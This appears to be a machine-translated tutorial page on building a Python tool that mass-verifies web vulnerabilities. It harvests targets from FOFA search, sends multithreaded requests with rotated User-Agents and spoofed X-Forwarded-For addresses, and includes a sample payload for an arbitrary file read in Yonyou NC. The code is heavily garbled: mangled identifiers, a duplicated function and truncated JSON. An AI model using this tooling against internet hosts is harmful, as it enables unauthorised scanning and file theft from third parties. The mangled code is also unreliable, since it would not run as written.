How to write the script for Python to implement the batch verification program for POC vulnerabilities 02/27 Update SLTechnology News&Howtos

How to write the script for Python to implement the batch verification program for POC vulnerabilities

2025-02-27 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Development >

Shulou(Shulou.com)06/01 Report--

This article mainly introduces the relevant knowledge of "how to write scripts for Python to achieve batch verification procedures for POC vulnerabilities". The editor shows you the operation process through actual cases. The operation method is simple, fast and practical. I hope that this article "how to write scripts for Python to achieve batch verification procedures for POC vulnerabilities" can help you solve the problem.

Demand analysis

1. Poc is as simple as possible.

2. Multithreading.

3. Join fofa to get the target.

4. Random request header.

Realization process

The script is divided into three modules, obtaining poc and target, multi-thread batch request verification, and output results. Batch request verification includes three parts: constructing multi-thread, modifying request parameters and sending request.

Main function

In the main function, there are three main parts to get the poc and the target, multithreading (populating the target into the queue, creating multithreading and starting it), and outputting the result.

The specific implementation is as follows:

Def main (): # response to Ctrl+C stopper signal.signal (signal.SIGINT, quit) signal.signal (signal.SIGTERM, quit) showpocs () # # get target targetList = getTarget () # # multithreaded batch request verification thread (targetList) # # output result putTarget (List) get target

With regard to target sources, there are three ways to design a single target, to read multiple targets from a file, and to get targets from FOFA_API according to FoFa syntax.

Define the function getTarget, which is divided into two parts

The first part is to obtain the target according to the-f Fofa syntax. The default number is 30.

The second part is to obtain the target to request verification according to-u url /-I file /-f num (number, default is 10). The two parts are different by whether to pass parameter poc parameter, and finally return a targetList list.

The specific implementation is as follows:

Def getTarget (): targetList= [] count=0 if result.poc==None: if result.outfileinitiate resultNone: # FOFA reads the destination if result.fofasts roomNone: qbase=result.fofa qbase64=str (base64.b64encode (qbase.encode ("utf-8")) "utf-8") print ("FOFA search: + qbase) fofa_url=" https://fofa.so/api/v1/search/all?email="+email+"&key="+key+"&qbase64="+qbase64+"&fields=title,host,ip,port, City&size=30 "try: res=requests.get (fofa_url) results = json.loads (res.text) filepath=result.outfile with open (filepath) 'w') as targets: for i in results [' results']: targets.write (I [1] +'\ n') print (I [1]) count+=1 print ("search results have" + str (count) + " Saved in "+ filepath+"!) Except Exception as e: print (e) sys.exit () else: if result.ResultsNone or result.filereadingNone or result.fofajustingNone: # single target if result.urlroomroomNone: targetList.append (result.url) # File read target if result .file! = None: try: filepath=result.file with open (filepath 'r') as targets: for target in targets.readlines (): targetList.append (target.strip ()) except Exception ase: print (e) # FOFA read target if result.fofasts read none: qbase= "" PocName = result.poc with open ('poc.json' Encoding='UTF-8') as f: data = json.load (f) for poc in data: if pocName = = poc: qbase=data [poc] ['fofa'] qbase64=str (base64.b64encode (qbase.encode ("utf-8")) "utf-8") try: fofa_url= "https://fofa.so/api/v1/search/all?email="+email+"&key="+key+"&qbase64="+qbase64+"&fields=title,host,ip,port, City&size= "+ str (result.fofa) res=requests.get (fofa_url) results = json.loads (res.text) print (" FOFA search: "+ qbase) print (" search results: "+ str (result.fofa) +") for i in results ['results']: TargetList.append (I [1]) # print (targetList) except Exception as e: print (e) return targetList else: sys.exit ("wrong! Lack of goal! ") Batch request verification

Define a thread function to encapsulate the code related to multithreaded requests. You need to pass in the acquired target parameter targetList.

The specific implementation is as follows:

Def thread (targetList): # # get poc poc=poc_load () # # fill queue queueLock.acquire () for target in targetList: targetQueue.put (target) queueLock.release () # # create thread threadList = [] threadNum=result.threadNum for i in range (0menthreadNum): t=reqThread (targetQueue Poc) t.setDaemon (True) threadList.append (t) for i in threadList: i.start () # wait for all threads to finish for t in threadList: t.join () load POC

Request verification must use the-p pocName parameter to specify the POC to use, and all POC is stored in the poc.json file.

The specific implementation is as follows

# load pocdef poc_load (): if result.uploaded json none: poc = result.poc isPoc = False # whether POC exists # read the json file with open ('poc.json' Encoding='UTF-8') as f: data = json.load (f) for key in data: if poc = = key: isPoc=True if isPoc==False: print ("POC does not exist!") Sys.exit ("Please view the poc list through-- show!") Else: return data [poc] else: pass multithreaded class

Define the reqThread thread class, incoming queue and poc two parameters to encapsulate the req request method.

The specific implementation is as follows:

Class reqThread (threading.Thread): def _ _ init__ (self, Q) Poc): threading.Thread.__init__ (self) self.q = Q self.poc=poc def run (self): try: while not self.q.empty (): queueLock.acquire () target=self.q.get () queueLock.release () if self.req (target): Print (target+ "is vuln!") List.append (target) else: pass except Exception as e: pass def req (self,url): poc=self.poc payload=urlParse (url) + poc ['request'] [' url'] res=requests.request (method=poc ['request'] [' method'], url=payload,headers=randomheaders (poc), proxies=getProxy (), data=poc ['request'] [' data'], verify=False Timeout=5) if res.status_code==200 and poc ['request'] [' confirm'] in res.text: return True else: return False

Within the request method in req, there are three ways to modify the request.

UrlParse

Text processing is performed on the acquired target.

# processing urldef urlParse (url): if "https://" not in url: if" http://" in url: url=url else: url= "http://"+url return urlgetProxy

Specify the request agent.

# Agent def urlParse (url): if "https://" not in url: if" http://" in url: url=url else: url= "http://"+url return urlrandomHeaders

Add random User-Agent, referer, XFF and other request header parameters.

Def randomHeaders (poc): headers= {} uaList= ['Mozilla/5.0 (X11; Linux x86' 64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.100 Safari/537.36', 'Mozilla/5.0 (iPhone; CPU iPhone OS 13' 3'1 like Mac OS X Zh-CN) AppleWebKit/537.51.1 (KHTML, like Gecko) Mobile/17D50 UCBrowser/12.8.2.1268 Mobile AliApp (TUnionSDK/0.1.20.3)', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10 / 14 / 3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.116 Safari/537.36',' Mozilla/5.0 (Linux; Android 8.1.0; OPPO R11t Build/OPM1.171019.011 Wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/76.0.3809.89 Mobile Safari/537.36 T7 SP-engine/2.15.0 baiduboxapp/11.19.5.10 11.19 SP-engine/2.15.0 baiduboxapp/11.19.5.10 (Baidu; P1 18.1.0)', 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36',' Mozilla/5.0 (iPhone) CPU iPhone OS 13331 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 SP-engine/2.14.0 main%2F1.0 baiduboxapp/11.18.0.16 (Baidu; P2 13.3.1) NABar/0.0', 'Mozilla/5.0 (Windows NT 10.0; Win64 X64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36',' Mozilla/5.0 (iPhone CPU iPhone OS 12'4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MicroMessenger/7.0.10 (0x17000a21) NetType/4G Language/zh_CN', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36',' Mozilla/5.0 (Windows NT 6.1) WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36',' Mozilla/5.0 (Windows NT 6.1; Win64 X64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.108 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36',' Mozilla/5.0 (Windows NT 10.0 WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 Safari/537.36',] refList= ["www.baidu.com"] xffList= ['127.0.0.1', '51.77.144.148', '80.93.212.46', '109.123.115.10', '187.44.229.50' '190.14.232.58,' 5.166.57.222, '36.94.142.165,' 52.149.152.236, '68.15.147.8, 188.166.215.141, 190.211.82.174' '101.51.139.179'] if' User-Agent' in poc ['request'] [' headers']: if poc ['request'] [' headers'] ['User-Agent'] .strip ()! ='': headers ['User-Agent'] = poc [' request'] ['headers'] [' User-Agent'] else: headers ['User-Agent' ] = random.choice (uaList) if 'referer' in poc [' request'] ['headers']: if poc [' request'] ['headers'] [' referer'] .strip ()! ='': headers ['referer'] = poc [' request'] ['headers'] [' referer'] else: headers ['referer'] = random.choice (refList) if' Xmurf ForwardedwashFor'in poc ['request'] [' headers']: if poc ['request'] [' headers'] ['User-Agent'] .strip ()! ='': headers ['Xmuri Forwardedwashi'] = poc ['request'] [' headers'] ['XKuk ForwardedForm'] else: headers ['XMuk ForwardedForm'] = random.choice (xffList) for key in poc ['request'] [' Headers']: if key! = "referer" and key! = "User-Agent" and key! = "X-Forwarded-For": headers [key] = poc ['request'] [' headers'] [key] return headers output result

Define the global variable List, store the target to be output, and define the output method putTarget.

The specific implementation is as follows:

List= [] # # output def putTarget (resultList): if result.fileprocessed none or result.fofastly created none: if len (resultList)! = 0: if result.outfile! = None: filepath=result.outfile with open (filepath) 'w') as targets: for target in resultList: targets.write (target+'\ n') print ("verification result has" + str (len (resultList)) + " Saved in "+ filepath+"!) Else: print ("No vulnerability targets found!") Else: pass other global variables # ignore https alarm requests.packages.urllib3.disable_warnings (InsecureRequestWarning) # # queue targetQueue = queue.Queue # # Lock queueLock = threading.Lock () # result List= [] # FoFAemail= "" key= "" command line read parameter arg = ArgumentParser (description='POC_Verify') arg.add_argument ('- key=, dest='url',help='Target URL',type=str) arg.add_argument ('- ialarm,'--file' Dest='file',help='Scan multiple targets given in a textual file',type=str) arg.add_argument ('- fags, "--fofa", dest='fofa',help='fofaquery Nums/String Example if poc-f 10 else-f "abc" default=30',default=10) arg.add_argument ('- packs, dest='poc',help=' Load POC file from poc.json') arg.add_argument ('- proxy', dest='proxy' Help='Use a proxy to connect to the target URL Example:-proxy http:127.0.0.1:8080',type=str) arg.add_argument ('- tweets, dest='threadNum',help='the thread_count,default=10', type=int, default=10) arg.add_argument ('- show', dest='show', help='show all pocs',nargs='?',const='all',type=str) arg.add_argument ('- oaks,'--outfile', dest='outfile', help='the file save result' Default='result.txt',type=str) result = arg.parse_args () poc details display # # display pocdef showpocs (): isPoc = False if result.show! = None: # read json file with open ('poc.json',encoding='UTF-8') as f: data = json.load (f) if result.show== "all": print ("pocname" .ljust (20) "description" .ljust (20) print ("-") for key in data: print (key.ljust (20) Data [key] ['name'] .ljust (20) else: if result.show in data: print ("pocname" .ljust (20) "description" .ljust (20) print ("-") print (result.show.ljust (20) Data [result.show] ['name'] .ljust (20) sys.exit () else: passCtrl+C end thread # stop program def quit (signum, frame): print (' You choose to stop me.') Sys.exit () def main (): # response to the Ctrl+C stopper signal.signal (signal.SIGINT, quit) signal.signal (signal.SIGTERM, quit) poc.json file

Poc is essentially a HTTP request. Based on the principle of simplicity, only five fields are designed: name, syntax of linkage fofa, request header, request content, and content echoed to verify the existence of loopholes.

{"pocname": {"name": "vulnerability description", "fofa": "fofa search string" Special symbols need to be escaped "," request ": {" method ":", "url": "," headers ": {" referer ":", "User-Agent": "," X-Forwarded-For ":" "Content-Type": "}," data ":", "confirm": "echo string"}}, "yonyounc": {"name": "any file read by NC", "fofa": "app=\" user-UFIDA-NC\ "" "request": {"method": "get", "url": "/ NCFindWeb?service=IPreAlertConfigService&filename=index.jsp", "headers": {"referer": "," User-Agent ":", "X-Forwarded-For": ""} "data": "," confirm ":"

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.